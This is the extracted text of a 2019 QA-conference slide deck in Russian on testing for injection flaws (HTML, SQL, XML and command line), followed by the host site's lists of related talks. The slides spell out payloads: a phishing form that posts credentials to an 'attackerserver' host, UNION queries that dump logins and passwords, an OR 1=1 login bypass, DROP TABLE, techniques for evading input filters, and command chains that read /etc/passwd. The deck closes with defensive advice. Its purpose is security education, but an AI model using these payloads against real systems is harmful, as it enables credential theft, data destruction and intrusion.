QA Fest 2019. Евгений Толчинский. Injections - 4 ways of Penetration

Q
Тема доклада
Тема доклада
Тема доклада
KYIV 2019
Evgeny Tolchinsky
Injections - 4 ways of Penetration
QA CONFERENCE #1 IN UKRAINE
О себе
4,5 года в тестировании
Senior manual Qa/Qa lead Ameria
Спикер на конференциях (KyivQaDay, Simplicity QA
360, ComaQa Minsk), митапах (OpenTechWeek,
Speakers’ Corner, KyivTestersMeetup)
Со-тренер на курсе OWASP TOP-10
До этого 9 лет в банковской сфере
Свитчер :-)
LinkedIn FB
T-shaped модель
Задачи Security QA engineer
OWASP TOP 10 2017
1. Injection
2. Broken Authentication
3. Sensitive Data Exposure
4. XML External Entities (XXE)
5. Broken Access Control
6. Security Misconfiguration
7. Cross-Site Scripting (XSS)
8. Insecure Deserialization
9. Using Components with Known Vulnerabilities
10. Insufficient Logging&Monitoring
Injection
HTML Injection SQL Injection
Injection
XML Injection command line Injection
HTML Injection
<h1>qwe</h1>
H1 - HTML тэг для отображения заголовка
<h3>Please Enter Your Username and Password to Proceed:</h3>
<form method="POST" action="http://attackerserver/login.php">
Username: <input type="text" name="username" /><br />
Password: <input type="password" name="password" /><br />
<input type="submit" value="Login" /></form><!--
SQL Injection
WEB Сервер СУБД
Как работает запрос в базу данных
POST request/ Поиск в базе
WEB Сервер СУБД
User
POST request
POST response
СУБДWEB Сервер
DB query
Select title, release, character, genge, IMDb
From movie
Where
title = ‘Iron Man’
Select title, release, character, genge, IMDb
From movie
Where
title = ‘'or 1=1 -- -’
‘ or 1=1 -- -Iron Man
Select title, release, character, genge, IMDb
From movie
Where
title = ‘1'union select 1,2,3,4,5,6,7#’
Select title, release, character, genge, IMDb
From movie
Where
title = ‘1'
union select 1,2,3,4,5,6,7#’
Select title, release, character, genge, IMDb
From movie
Where
title = ‘1'
union select 1,login,password,4,current_user,6,7
from users#’'
Select title, release, character, genge, IMDb
From movie
Where
title = ‘1'
union select
1,database(),version(),4,current_user,6,7#’
1' union select
1,database(),version(),4,current_user,6,7#
1' union select
1,login,password,4,current_user,6,7 from users#
Форма логина
Authorization
User
Pass
User
request
response
СУБДWEB Сервер
DB query
Select *
From users
Where
user_name = ‘Evgeny’
AND password = ‘1234’
Authorization
User
Pass
Evgeny
1234
Authorization
User
Pass
admin
‘ OR 1=1 -- -
Select *
From users
Where
user_name = ‘admin’
AND password = ‘’ OR 1=1 --’
Select *
From users
Where
user_name = ‘admin’
AND password = ‘’ OR 1=1 --’’
Select *
From users
Where
user_name = ‘admin’
AND password = ‘’
OR 1=1 --
id username password email
0 admin admin1234 admin@com.ua
Authorization
User
Pass
admin
‘; DROP TABLE users --
Как обойти базовые фильтры
разработчиков
Символ Encode Encode x2
‘ %27 %2527
“ %22 %2522
# %23 %2523
-- %2d%2d %252d%252d
; %3B %253B
) %29 %2529
* %2a %252a
;%00 NULLBYTE
/* C-style comment
-- - SQL Comment
SeLeCt
%00SELECT
SELSELECTECT
AND -------------> &&
OR -------------> ||
= -------------> LIKE,REGEXP, not < and not >
> чего-то ----------------> not between 0 and
чего-то
WHERE ----------------> HAVING
‘ or 1=1 — true 3=3
‘ or 1=2 — false 3=4
‘ and 1=1 — true 3=3
‘ and 1=2 — false 3=4
‘ or 1<2 — true 3<4
‘ or 1>2 — false 3>4
‘ or ‘aaaaa’<>’bbbbb’ — Лучший хак
%09 – Horizontal Tab
%0A – New Line
%0D – Carriage Return
%0B – Vertical Tab
%0C – New Page
%A0 - Non-breaking Space
/**/ - comment
/*!*/ - comment
QA Fest 2019. Евгений Толчинский. Injections - 4 ways of Penetration
XML Injection
Как работает XML
User
POST request
POST response
СУБДWEB Сервер
DB query
Как работает XML
Registration
User
Pass
Email
Evgeny
1234
a@b.com
<user>
<nameuser>Evgeny</nameuser>
<pass>1234</pass>
<mail>a@b.com</mail>
</user>
Registration
User
Pass
Email
Evgeny
1234
abc</mail><role>A
dmin</role><mail>a
@b.com
<user>
<nameuser>Evgeny</nameuser>
<pass>1234</pass>
<role>user</role>
<mail>abc</mail>
<role>Admin</role>
<mail>a@b.com</mail>
</user>
<user>
<nameuser>Evgeny</nameuser>
<pass>1234</pass>
<role>user</role>
<mail>abc</mail>
<role>Admin</role>
<mail>a@b.com</mail>
</user>
Command line Injection
ping 127.0.0.1
| ping -i 30 127.0.0.1 |
& ping -i 30 127.0.0.1 &
; ping -i 30 127.0.0.1;
ping 127.0.0.1;sleep 10
QA Fest 2019. Евгений Толчинский. Injections - 4 ways of Penetration
;pwd ;ls;
+|+Dir c:
Задать доп команды:
ком1|ком2 - команда 2 выполнима, если команда 1 будет выполнена или нет
ком1;ком2 - команда 2 выполнима, если команда 1 будет выполнена или нет
ком1||ком2 - команда 2 будет выполнена, только в случаи сбоя команды 1
ком1&&ком2 - команда 2 будет выполнена только при успешном выполнении
команды 1
В середине команд:
$(cat /etc/passwd)
‘ cat /etc/passwd’
Слепое внедрение:
sleep(5)
ping -i 30 127.0.0.1
Как защититься?
1. Не доверять пользовательскому вводу
2. Использование безопасного фреймворка для обработки вводимых
данных пользователем (Alchemy(Алхимия))
Как защититься?
3. Использование «White List» и Black List» на стороне сервера
Как защититься?
4. Избежание спец символов или где они необходимы использование
фильтрации.
Как защититься?
5. Использование LIMIT в SQL запросах
Как защититься?
Ссылки
1. OWASP TOP 10 2017
2. OWASP testing guide
3. Mobile Top 10 2016
4. Блог Святослава Логина
5. Портал для обучения HTML, JS, SQL …
6. Когда хочется просто пофлудить, а иногда встретиться
и выпить пиво с коллегами :-)
Телеграм канал QA_ua
Тема доклада
Тема доклада
Тема доклада
WITH PASSION TO QUALITY
СПАСИБО
QA CONFERENCE #1 IN UKRAINE KYIV 2019
1 of 41

Recommended

Григорий Джанелидзе, OK.RU by
Григорий Джанелидзе, OK.RUГригорий Джанелидзе, OK.RU
Григорий Джанелидзе, OK.RUBadoo Development
5.5K views26 slides
The fast and the continuous (SeleniumCamp 2014) by
The fast and the continuous (SeleniumCamp 2014)The fast and the continuous (SeleniumCamp 2014)
The fast and the continuous (SeleniumCamp 2014)Andrei Solntsev
1.4K views50 slides
Selenium на практике и подводные камни by
Selenium на практике и подводные камниSelenium на практике и подводные камни
Selenium на практике и подводные камниSQALab
672 views13 slides
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA... by
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...
ЄВГЕНІЙ ТОЛЧИНСКИЙ «Як manual QA може протестувати проект з боку security» QA...GoQA
206 views25 slides
Как мануальный тестировщик может базово протестировать безопасность, Евгений ... by
Как мануальный тестировщик может базово протестировать безопасность, Евгений ...Как мануальный тестировщик может базово протестировать безопасность, Евгений ...
Как мануальный тестировщик может базово протестировать безопасность, Евгений ...Sigma Software
679 views25 slides
Тестирование уязвимостей веб приложений by
Тестирование уязвимостей веб приложенийТестирование уязвимостей веб приложений
Тестирование уязвимостей веб приложенийSQALab
5.3K views50 slides

More Related Content

What's hot

тестирование защищенности веб приложений by
тестирование защищенности веб приложенийтестирование защищенности веб приложений
тестирование защищенности веб приложенийZestranec
2.7K views56 slides
А не поговорить ли нам о XSS! by
А не поговорить ли нам о XSS!А не поговорить ли нам о XSS!
А не поговорить ли нам о XSS!SQALab
1.7K views12 slides
Плюсы и минусы автоматизации, пример из жизни by
Плюсы и минусы автоматизации, пример из жизниПлюсы и минусы автоматизации, пример из жизни
Плюсы и минусы автоматизации, пример из жизниz-tech
2.1K views38 slides
Microservices for test automation - OK.RU expirience by
Microservices for test automation - OK.RU expirienceMicroservices for test automation - OK.RU expirience
Microservices for test automation - OK.RU expirienceNikita Makarov
610 views45 slides
Руководство по приготовлению бутербродов из Selenium by
Руководство по приготовлению бутербродов из SeleniumРуководство по приготовлению бутербродов из Selenium
Руководство по приготовлению бутербродов из SeleniumUladzimir Kryvenka
2.2K views36 slides
Безопасность веб-приложений: starter edition by
Безопасность веб-приложений: starter editionБезопасность веб-приложений: starter edition
Безопасность веб-приложений: starter editionAndrew Petukhov
1.4K views28 slides

What's hot(7)

тестирование защищенности веб приложений by Zestranec
тестирование защищенности веб приложенийтестирование защищенности веб приложений
тестирование защищенности веб приложений
Zestranec2.7K views
А не поговорить ли нам о XSS! by SQALab
А не поговорить ли нам о XSS!А не поговорить ли нам о XSS!
А не поговорить ли нам о XSS!
SQALab1.7K views
Плюсы и минусы автоматизации, пример из жизни by z-tech
Плюсы и минусы автоматизации, пример из жизниПлюсы и минусы автоматизации, пример из жизни
Плюсы и минусы автоматизации, пример из жизни
z-tech2.1K views
Microservices for test automation - OK.RU expirience by Nikita Makarov
Microservices for test automation - OK.RU expirienceMicroservices for test automation - OK.RU expirience
Microservices for test automation - OK.RU expirience
Nikita Makarov610 views
Руководство по приготовлению бутербродов из Selenium by Uladzimir Kryvenka
Руководство по приготовлению бутербродов из SeleniumРуководство по приготовлению бутербродов из Selenium
Руководство по приготовлению бутербродов из Selenium
Uladzimir Kryvenka2.2K views
Безопасность веб-приложений: starter edition by Andrew Petukhov
Безопасность веб-приложений: starter editionБезопасность веб-приложений: starter edition
Безопасность веб-приложений: starter edition
Andrew Petukhov1.4K views
Добиваемся эффективности каждого из 9000+ UI-тестов - Максим Сахаров (Tutu.ru) by AvitoTech
Добиваемся эффективности каждого из 9000+ UI-тестов - Максим Сахаров (Tutu.ru)Добиваемся эффективности каждого из 9000+ UI-тестов - Максим Сахаров (Tutu.ru)
Добиваемся эффективности каждого из 9000+ UI-тестов - Максим Сахаров (Tutu.ru)
AvitoTech529 views

Similar to QA Fest 2019. Евгений Толчинский. Injections - 4 ways of Penetration

So Your WAF Needs a Parser by
So Your WAF Needs a ParserSo Your WAF Needs a Parser
So Your WAF Needs a Parseryalegko
146 views73 slides
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский... by
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...Ontico
440 views79 slides
СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021 by
СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021
СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021GoQA
78 views50 slides
Advanced Sql Injection by
Advanced Sql InjectionAdvanced Sql Injection
Advanced Sql InjectionDmitry Evteev
2K views61 slides
Шаблонизируй это. Как паттерны требований облегчают жизнь аналитика by
Шаблонизируй это. Как паттерны требований облегчают жизнь аналитикаШаблонизируй это. Как паттерны требований облегчают жизнь аналитика
Шаблонизируй это. Как паттерны требований облегчают жизнь аналитикаSQALab
1.8K views35 slides
Sql injection by
Sql injectionSql injection
Sql injectionMichal11221
66 views62 slides

Similar to QA Fest 2019. Евгений Толчинский. Injections - 4 ways of Penetration(20)

So Your WAF Needs a Parser by yalegko
So Your WAF Needs a ParserSo Your WAF Needs a Parser
So Your WAF Needs a Parser
yalegko146 views
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский... by Ontico
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...
Опыт разработки модуля межсетевого экранирования для MySQL / Олег Брославский...
Ontico440 views
СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021 by GoQA
СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021
СВЯТ ЛОГИН «OWASP TOP 10 2021» Online QADay 2021
GoQA78 views
Шаблонизируй это. Как паттерны требований облегчают жизнь аналитика by SQALab
Шаблонизируй это. Как паттерны требований облегчают жизнь аналитикаШаблонизируй это. Как паттерны требований облегчают жизнь аналитика
Шаблонизируй это. Как паттерны требований облегчают жизнь аналитика
SQALab1.8K views
Миграция JIRA - безобразие или безрассудство by SQALab
Миграция JIRA - безобразие или безрассудствоМиграция JIRA - безобразие или безрассудство
Миграция JIRA - безобразие или безрассудство
SQALab2K views
Игорь Любин -- Об опыте тестирования программного компонента без пользователь... by sqadays8
Игорь Любин -- Об опыте тестирования программного компонента без пользователь...Игорь Любин -- Об опыте тестирования программного компонента без пользователь...
Игорь Любин -- Об опыте тестирования программного компонента без пользователь...
sqadays81.3K views
Регрессионное тестирование верстки by Talks&Works
Регрессионное тестирование версткиРегрессионное тестирование верстки
Регрессионное тестирование верстки
Talks&Works229 views
Тестирование защищенности веб-приложений by SQALab
Тестирование защищенности веб-приложенийТестирование защищенности веб-приложений
Тестирование защищенности веб-приложений
SQALab4.2K views
Методы обхода Web Application Firewall by Dmitry Evteev
Методы обхода Web Application FirewallМетоды обхода Web Application Firewall
Методы обхода Web Application Firewall
Dmitry Evteev3.9K views
Приемочные тесты на огурце by Alexander Byndyu
Приемочные тесты на огурцеПриемочные тесты на огурце
Приемочные тесты на огурце
Alexander Byndyu2.9K views
Svyatoslav Login "How to test authentication and authorization for security" by Fwdays
Svyatoslav Login "How to test authentication and authorization for security"Svyatoslav Login "How to test authentication and authorization for security"
Svyatoslav Login "How to test authentication and authorization for security"
Fwdays588 views
Client Side Autotesting Flash by guestb0af15
Client Side Autotesting FlashClient Side Autotesting Flash
Client Side Autotesting Flash
guestb0af151.1K views
PHP 5.4: Что нового? by phpdevby
PHP 5.4: Что нового?PHP 5.4: Что нового?
PHP 5.4: Что нового?
phpdevby1.1K views
Тестирование программных фильтров безопасности by Zestranec
Тестирование программных фильтров безопасностиТестирование программных фильтров безопасности
Тестирование программных фильтров безопасности
Zestranec752 views

More from QAFest

QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин by
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилинQA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилинQAFest
979 views44 slides
QA Fest 2019. Анна Чернышова. Self-healing test automation 2.0. The Future by
QA Fest 2019. Анна Чернышова. Self-healing test automation 2.0. The FutureQA Fest 2019. Анна Чернышова. Self-healing test automation 2.0. The Future
QA Fest 2019. Анна Чернышова. Self-healing test automation 2.0. The FutureQAFest
931 views44 slides
QA Fest 2019. Doug Sillars. It's just too Slow: Testing Mobile application pe... by
QA Fest 2019. Doug Sillars. It's just too Slow: Testing Mobile application pe...QA Fest 2019. Doug Sillars. It's just too Slow: Testing Mobile application pe...
QA Fest 2019. Doug Sillars. It's just too Slow: Testing Mobile application pe...QAFest
322 views131 slides
QA Fest 2019. Катерина Спринсян. Параллельное покрытие автотестами и другие и... by
QA Fest 2019. Катерина Спринсян. Параллельное покрытие автотестами и другие и...QA Fest 2019. Катерина Спринсян. Параллельное покрытие автотестами и другие и...
QA Fest 2019. Катерина Спринсян. Параллельное покрытие автотестами и другие и...QAFest
336 views92 slides
QA Fest 2019. Никита Галкин. Как зарабатывать больше by
QA Fest 2019. Никита Галкин. Как зарабатывать большеQA Fest 2019. Никита Галкин. Как зарабатывать больше
QA Fest 2019. Никита Галкин. Как зарабатывать большеQAFest
389 views40 slides
QA Fest 2019. Сергей Пирогов. Why everything is spoiled by
QA Fest 2019. Сергей Пирогов. Why everything is spoiledQA Fest 2019. Сергей Пирогов. Why everything is spoiled
QA Fest 2019. Сергей Пирогов. Why everything is spoiledQAFest
342 views33 slides

More from QAFest(20)

QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин by QAFest
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилинQA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
QA Fest 2019. Сергій Короленко. Топ веб вразливостей за 40 хвилин
QAFest979 views
QA Fest 2019. Анна Чернышова. Self-healing test automation 2.0. The Future by QAFest
QA Fest 2019. Анна Чернышова. Self-healing test automation 2.0. The FutureQA Fest 2019. Анна Чернышова. Self-healing test automation 2.0. The Future
QA Fest 2019. Анна Чернышова. Self-healing test automation 2.0. The Future
QAFest931 views
QA Fest 2019. Doug Sillars. It's just too Slow: Testing Mobile application pe... by QAFest
QA Fest 2019. Doug Sillars. It's just too Slow: Testing Mobile application pe...QA Fest 2019. Doug Sillars. It's just too Slow: Testing Mobile application pe...
QA Fest 2019. Doug Sillars. It's just too Slow: Testing Mobile application pe...
QAFest322 views
QA Fest 2019. Катерина Спринсян. Параллельное покрытие автотестами и другие и... by QAFest
QA Fest 2019. Катерина Спринсян. Параллельное покрытие автотестами и другие и...QA Fest 2019. Катерина Спринсян. Параллельное покрытие автотестами и другие и...
QA Fest 2019. Катерина Спринсян. Параллельное покрытие автотестами и другие и...
QAFest336 views
QA Fest 2019. Никита Галкин. Как зарабатывать больше by QAFest
QA Fest 2019. Никита Галкин. Как зарабатывать большеQA Fest 2019. Никита Галкин. Как зарабатывать больше
QA Fest 2019. Никита Галкин. Как зарабатывать больше
QAFest389 views
QA Fest 2019. Сергей Пирогов. Why everything is spoiled by QAFest
QA Fest 2019. Сергей Пирогов. Why everything is spoiledQA Fest 2019. Сергей Пирогов. Why everything is spoiled
QA Fest 2019. Сергей Пирогов. Why everything is spoiled
QAFest342 views
QA Fest 2019. Сергей Новик. Между мотивацией и выгоранием by QAFest
QA Fest 2019. Сергей Новик. Между мотивацией и выгораниемQA Fest 2019. Сергей Новик. Между мотивацией и выгоранием
QA Fest 2019. Сергей Новик. Между мотивацией и выгоранием
QAFest249 views
QA Fest 2019. Владимир Никонов. Код Шредингера или зачем и как мы тестируем н... by QAFest
QA Fest 2019. Владимир Никонов. Код Шредингера или зачем и как мы тестируем н...QA Fest 2019. Владимир Никонов. Код Шредингера или зачем и как мы тестируем н...
QA Fest 2019. Владимир Никонов. Код Шредингера или зачем и как мы тестируем н...
QAFest338 views
QA Fest 2019. Владимир Трандафилов. GUI automation of WEB application with SV... by QAFest
QA Fest 2019. Владимир Трандафилов. GUI automation of WEB application with SV...QA Fest 2019. Владимир Трандафилов. GUI automation of WEB application with SV...
QA Fest 2019. Владимир Трандафилов. GUI automation of WEB application with SV...
QAFest227 views
QA Fest 2019. Иван Крутов. Bulletproof Selenium Cluster by QAFest
QA Fest 2019. Иван Крутов. Bulletproof Selenium ClusterQA Fest 2019. Иван Крутов. Bulletproof Selenium Cluster
QA Fest 2019. Иван Крутов. Bulletproof Selenium Cluster
QAFest282 views
QA Fest 2019. Николай Мижигурский. Миссия /*не*/выполнима: гуманитарий собесе... by QAFest
QA Fest 2019. Николай Мижигурский. Миссия /*не*/выполнима: гуманитарий собесе...QA Fest 2019. Николай Мижигурский. Миссия /*не*/выполнима: гуманитарий собесе...
QA Fest 2019. Николай Мижигурский. Миссия /*не*/выполнима: гуманитарий собесе...
QAFest251 views
QA Fest 2019. Володимир Стиран. Чим раніше – тим вигідніше, але ніколи не піз... by QAFest
QA Fest 2019. Володимир Стиран. Чим раніше – тим вигідніше, але ніколи не піз...QA Fest 2019. Володимир Стиран. Чим раніше – тим вигідніше, але ніколи не піз...
QA Fest 2019. Володимир Стиран. Чим раніше – тим вигідніше, але ніколи не піз...
QAFest301 views
QA Fest 2019. Дмитрий Прокопук. Mocks and network tricks in UI automation by QAFest
QA Fest 2019. Дмитрий Прокопук. Mocks and network tricks in UI automationQA Fest 2019. Дмитрий Прокопук. Mocks and network tricks in UI automation
QA Fest 2019. Дмитрий Прокопук. Mocks and network tricks in UI automation
QAFest225 views
QA Fest 2019. Екатерина Дядечко. Тестирование медицинского софта — вызовы и в... by QAFest
QA Fest 2019. Екатерина Дядечко. Тестирование медицинского софта — вызовы и в...QA Fest 2019. Екатерина Дядечко. Тестирование медицинского софта — вызовы и в...
QA Fest 2019. Екатерина Дядечко. Тестирование медицинского софта — вызовы и в...
QAFest243 views
QA Fest 2019. Катерина Черникова. Tune your P’s: the pop-art of keeping testa... by QAFest
QA Fest 2019. Катерина Черникова. Tune your P’s: the pop-art of keeping testa...QA Fest 2019. Катерина Черникова. Tune your P’s: the pop-art of keeping testa...
QA Fest 2019. Катерина Черникова. Tune your P’s: the pop-art of keeping testa...
QAFest376 views
QA Fest 2019. Алиса Бойко. Какнезапутаться в коммуникативных сетях IT by QAFest
QA Fest 2019. Алиса Бойко. Какнезапутаться в коммуникативных сетях ITQA Fest 2019. Алиса Бойко. Какнезапутаться в коммуникативных сетях IT
QA Fest 2019. Алиса Бойко. Какнезапутаться в коммуникативных сетях IT
QAFest209 views
QA Fest 2019. Святослав Логин. Как найти уязвимости в мобильном приложении by QAFest
QA Fest 2019. Святослав Логин. Как найти уязвимости в мобильном приложенииQA Fest 2019. Святослав Логин. Как найти уязвимости в мобильном приложении
QA Fest 2019. Святослав Логин. Как найти уязвимости в мобильном приложении
QAFest607 views
QA Fest 2019. Катерина Шепелєва та Інна Оснач. Що українцям потрібно знати пр... by QAFest
QA Fest 2019. Катерина Шепелєва та Інна Оснач. Що українцям потрібно знати пр...QA Fest 2019. Катерина Шепелєва та Інна Оснач. Що українцям потрібно знати пр...
QA Fest 2019. Катерина Шепелєва та Інна Оснач. Що українцям потрібно знати пр...
QAFest321 views
QA Fest 2019. Антон Серпутько. Нагрузочное тестирование распределенных асинхр... by QAFest
QA Fest 2019. Антон Серпутько. Нагрузочное тестирование распределенных асинхр...QA Fest 2019. Антон Серпутько. Нагрузочное тестирование распределенных асинхр...
QA Fest 2019. Антон Серпутько. Нагрузочное тестирование распределенных асинхр...
QAFest296 views
QA Fest 2019. Петр Тарасенко. QA Hackathon - The Cookbook 22 by QAFest
QA Fest 2019. Петр Тарасенко. QA Hackathon - The Cookbook 22QA Fest 2019. Петр Тарасенко. QA Hackathon - The Cookbook 22
QA Fest 2019. Петр Тарасенко. QA Hackathon - The Cookbook 22
QAFest164 views

QA Fest 2019. Евгений Толчинский. Injections - 4 ways of Penetration

Editor's Notes

  1. Отметить